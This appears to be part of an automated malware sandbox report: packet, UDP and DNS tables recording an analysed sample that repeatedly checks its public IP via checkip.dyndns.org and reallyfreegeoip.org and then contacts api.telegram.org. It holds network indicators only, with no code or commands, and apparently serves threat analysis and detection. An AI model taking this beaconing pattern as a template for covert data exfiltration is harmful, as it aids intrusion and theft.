                                                                                                          Oct 30, 2024 08:32:11.111140013 CET44349166188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:11.111210108 CET44349166188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:11.111344099 CET49166443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:11.117033005 CET49166443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:11.144603014 CET4916580192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:11.150119066 CET8049165132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:11.452590942 CET8049165132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:11.477108955 CET49167443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:11.477164984 CET44349167188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:11.477217913 CET49167443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:11.477902889 CET49167443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:11.477914095 CET44349167188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:11.662090063 CET8049165132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:11.662174940 CET4916580192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:12.087459087 CET44349167188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:12.112353086 CET49167443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:12.112386942 CET44349167188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:12.249568939 CET44349167188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:12.249634027 CET44349167188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:12.249689102 CET49167443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:12.271735907 CET49167443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:12.823698044 CET4916580192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:12.829600096 CET8049165132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:12.829658031 CET4916580192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:12.867436886 CET4916880192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:32:12.872858047 CET8049168132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:32:12.872909069 CET4916880192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:32:12.873116016 CET4916880192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:32:12.878422022 CET8049168132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:32:13.865834951 CET8049168132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:32:13.886985064 CET49169443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:13.887023926 CET44349169188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:13.887124062 CET49169443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:13.887557030 CET49169443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:13.887576103 CET44349169188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:14.061495066 CET4916880192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:32:14.483726978 CET44349169188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:14.692543030 CET49169443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:14.692559958 CET44349169188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:14.831980944 CET44349169188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:14.832094908 CET44349169188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:14.832180977 CET49169443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:14.848256111 CET49169443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:15.087799072 CET4916880192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:32:15.093653917 CET8049168132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:32:15.093718052 CET4916880192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:32:15.184454918 CET4917080192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:15.189865112 CET8049170132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:15.189939976 CET4917080192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:15.190013885 CET4917080192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:15.195380926 CET8049170132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:16.072778940 CET8049170132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:16.095324039 CET49171443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:16.095366955 CET44349171188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:16.095426083 CET49171443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:16.095870018 CET49171443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:16.095880032 CET44349171188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:16.277937889 CET8049170132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:16.278047085 CET4917080192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:16.706940889 CET44349171188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:16.709994078 CET49171443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:16.710011959 CET44349171188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:16.850761890 CET44349171188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:16.850831032 CET44349171188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:16.850924969 CET49171443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:16.851607084 CET49171443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:16.865704060 CET4917080192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:16.871328115 CET8049170132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:16.871392965 CET4917080192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:16.889724016 CET4917280192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:32:16.895123959 CET8049172158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:32:16.895188093 CET4917280192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:32:16.895293951 CET4917280192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:32:16.900609970 CET8049172158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:32:17.982361078 CET8049172158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:32:18.027910948 CET49173443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:32:18.027966022 CET44349173188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:18.028040886 CET49173443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:32:18.028436899 CET49173443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:32:18.028458118 CET44349173188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:18.179924011 CET4917280192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:32:18.634804010 CET44349173188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:18.638845921 CET49173443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:32:18.638864040 CET44349173188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:18.778505087 CET44349173188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:18.778570890 CET44349173188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:18.778692961 CET49173443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:32:18.779337883 CET49173443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:32:18.827275038 CET4917480192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:18.832673073 CET8049174132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:18.834669113 CET4917480192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:18.834793091 CET4917480192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:18.840099096 CET8049174132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:19.723748922 CET8049174132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:19.761245012 CET49175443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:19.761331081 CET44349175188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:19.761401892 CET49175443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:19.762023926 CET49175443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:19.762058973 CET44349175188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:19.927136898 CET4917480192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:20.364007950 CET44349175188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:20.373505116 CET49175443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:20.373548985 CET44349175188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:20.515013933 CET44349175188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:20.515098095 CET44349175188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:20.515155077 CET49175443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:20.534312010 CET49175443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:20.700927973 CET4917480192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:20.706814051 CET8049174132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:20.706897020 CET4917480192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:20.733530998 CET4917680192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:20.738948107 CET8049176132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:20.744441032 CET4917680192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:20.744688988 CET4917680192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:20.749970913 CET8049176132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:21.633785963 CET8049176132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:21.654357910 CET49177443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:32:21.654448986 CET44349177188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:21.654537916 CET49177443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:32:21.654953957 CET49177443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:32:21.654990911 CET44349177188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:21.845938921 CET4917680192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:22.269478083 CET44349177188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:22.272878885 CET49177443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:32:22.272943974 CET44349177188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:22.412286997 CET44349177188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:22.412353039 CET44349177188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:22.412559032 CET49177443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:32:22.413177967 CET49177443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:32:22.431087971 CET4917680192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:22.436855078 CET8049176132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:32:22.436990023 CET4917680192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:32:22.455691099 CET4917880192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:32:22.461133003 CET8049178132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:32:22.461219072 CET4917880192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:32:22.461275101 CET4917880192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:32:22.466624975 CET8049178132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:32:24.100095034 CET8049178132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:32:24.123857975 CET49179443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:24.123948097 CET44349179188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:24.124039888 CET49179443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:24.124547958 CET49179443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:24.124588013 CET44349179188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:24.310744047 CET4917880192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:32:24.314028025 CET8049178132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:32:24.314086914 CET4917880192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:32:24.732705116 CET44349179188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:24.735588074 CET49179443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:24.735610008 CET44349179188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:24.879523993 CET44349179188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:24.879586935 CET44349179188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:24.879638910 CET49179443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:24.880175114 CET49179443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:24.894707918 CET4917880192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:32:24.900682926 CET8049178132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:32:24.900753021 CET4917880192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:32:25.268868923 CET4918080192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:32:25.274317980 CET8049180193.122.130.0192.168.2.22
                                                                                                          Oct 30, 2024 08:32:25.274384975 CET4918080192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:32:25.278639078 CET4918080192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:32:25.283979893 CET8049180193.122.130.0192.168.2.22
                                                                                                          Oct 30, 2024 08:32:28.116275072 CET8049180193.122.130.0192.168.2.22
                                                                                                          Oct 30, 2024 08:32:28.157216072 CET49181443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:28.157310963 CET44349181188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:28.157418966 CET49181443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:28.157844067 CET49181443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:28.157877922 CET44349181188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:28.325956106 CET8049180193.122.130.0192.168.2.22
                                                                                                          Oct 30, 2024 08:32:28.326037884 CET4918080192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:32:28.768865108 CET44349181188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:28.772260904 CET49181443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:28.772325993 CET44349181188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:28.926218033 CET44349181188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:28.926297903 CET44349181188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:32:28.926367044 CET49181443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:28.927036047 CET49181443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:32:28.940097094 CET4918080192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:32:28.945956945 CET8049180193.122.130.0192.168.2.22
                                                                                                          Oct 30, 2024 08:32:28.946067095 CET4918080192.168.2.22193.122.130.0
                                                                                                          Oct 30, 2024 08:32:28.955012083 CET49182443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:32:28.955069065 CET44349182149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:32:28.955152035 CET49182443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:32:28.955779076 CET49182443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:32:28.955796957 CET44349182149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:32:29.802124023 CET44349182149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:32:29.802278042 CET49182443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:32:29.839634895 CET49182443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:32:29.839663982 CET44349182149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:32:29.840186119 CET44349182149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:32:29.844139099 CET49182443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:32:29.891357899 CET44349182149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:32:30.082537889 CET44349182149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:32:30.082640886 CET44349182149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:32:30.082711935 CET49182443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:32:30.087282896 CET49182443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:33:23.004616976 CET8049172158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:33:23.004890919 CET4917280192.168.2.22158.101.44.242

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 30, 2024 08:32:08.205182076 CET5456253192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:08.212162018 CET53545628.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:08.250520945 CET5291753192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:08.257277012 CET53529178.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:10.244262934 CET6275153192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:10.255556107 CET53627518.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:12.838057041 CET5789353192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:12.845346928 CET53578938.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:12.859853029 CET5482153192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:12.866866112 CET53548218.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:13.877624989 CET5471953192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:13.885658979 CET53547198.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:15.134579897 CET4988153192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:15.142138004 CET53498818.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:15.176908970 CET5499853192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:15.183909893 CET53549988.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:16.083165884 CET5278153192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:16.094695091 CET53527818.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:16.872478008 CET6392653192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:16.879915953 CET53639268.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:16.882375956 CET6551053192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:16.889272928 CET53655108.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:18.015949965 CET6267253192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:18.027404070 CET53626728.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:18.807462931 CET5647553192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:18.814678907 CET53564758.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:18.819120884 CET4938453192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:18.825968981 CET53493848.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:19.752528906 CET5484253192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:19.760027885 CET53548428.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:20.706096888 CET5810553192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:20.713062048 CET53581058.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:20.716208935 CET6492853192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:20.723248959 CET53649288.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:20.723579884 CET6492853192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:20.730690002 CET53649288.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:21.642784119 CET5739053192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:21.653876066 CET53573908.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:22.438935995 CET5809553192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:22.445962906 CET53580958.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:22.448156118 CET5426153192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:22.455332994 CET53542618.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:24.115633965 CET6050753192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:24.123392105 CET53605078.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:24.915071964 CET5044653192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:24.922545910 CET53504468.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:25.255786896 CET5593953192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:25.263012886 CET53559398.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:28.122699976 CET4960853192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:28.133884907 CET53496088.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:32:28.947381973 CET6148653192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:32:28.954361916 CET53614868.8.8.8192.168.2.22

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Oct 30, 2024 08:32:08.205182076 CET192.168.2.228.8.8.80xa3d4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:08.250520945 CET192.168.2.228.8.8.80xf78aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:10.244262934 CET192.168.2.228.8.8.80xa2eaStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:12.838057041 CET192.168.2.228.8.8.80x1a6bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:12.859853029 CET192.168.2.228.8.8.80xe98Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:13.877624989 CET192.168.2.228.8.8.80x131fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:15.134579897 CET192.168.2.228.8.8.80xf0b4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:15.176908970 CET192.168.2.228.8.8.80x3c4eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.083165884 CET192.168.2.228.8.8.80xf8dcStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.872478008 CET192.168.2.228.8.8.80x182dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.882375956 CET192.168.2.228.8.8.80x17e4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.015949965 CET192.168.2.228.8.8.80xa14aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.807462931 CET192.168.2.228.8.8.80xb211Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.819120884 CET192.168.2.228.8.8.80x882fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:19.752528906 CET192.168.2.228.8.8.80x1d6cStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.706096888 CET192.168.2.228.8.8.80x9a1aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.716208935 CET192.168.2.228.8.8.80xd529Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.723579884 CET192.168.2.228.8.8.80xd529Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:21.642784119 CET192.168.2.228.8.8.80x9e24Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:22.438935995 CET192.168.2.228.8.8.80xdd84Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:22.448156118 CET192.168.2.228.8.8.80x46ccStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:24.115633965 CET192.168.2.228.8.8.80x1b7aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:24.915071964 CET192.168.2.228.8.8.80x1811Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:25.255786896 CET192.168.2.228.8.8.80x6caaStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:28.122699976 CET192.168.2.228.8.8.80xcfe6Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:28.947381973 CET192.168.2.228.8.8.80x413fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Oct 30, 2024 08:32:08.212162018 CET8.8.8.8192.168.2.220xa3d4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:08.212162018 CET8.8.8.8192.168.2.220xa3d4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:08.212162018 CET8.8.8.8192.168.2.220xa3d4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:08.212162018 CET8.8.8.8192.168.2.220xa3d4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:08.212162018 CET8.8.8.8192.168.2.220xa3d4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:08.212162018 CET8.8.8.8192.168.2.220xa3d4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:08.257277012 CET8.8.8.8192.168.2.220xf78aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:08.257277012 CET8.8.8.8192.168.2.220xf78aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:08.257277012 CET8.8.8.8192.168.2.220xf78aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:08.257277012 CET8.8.8.8192.168.2.220xf78aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:08.257277012 CET8.8.8.8192.168.2.220xf78aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:08.257277012 CET8.8.8.8192.168.2.220xf78aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
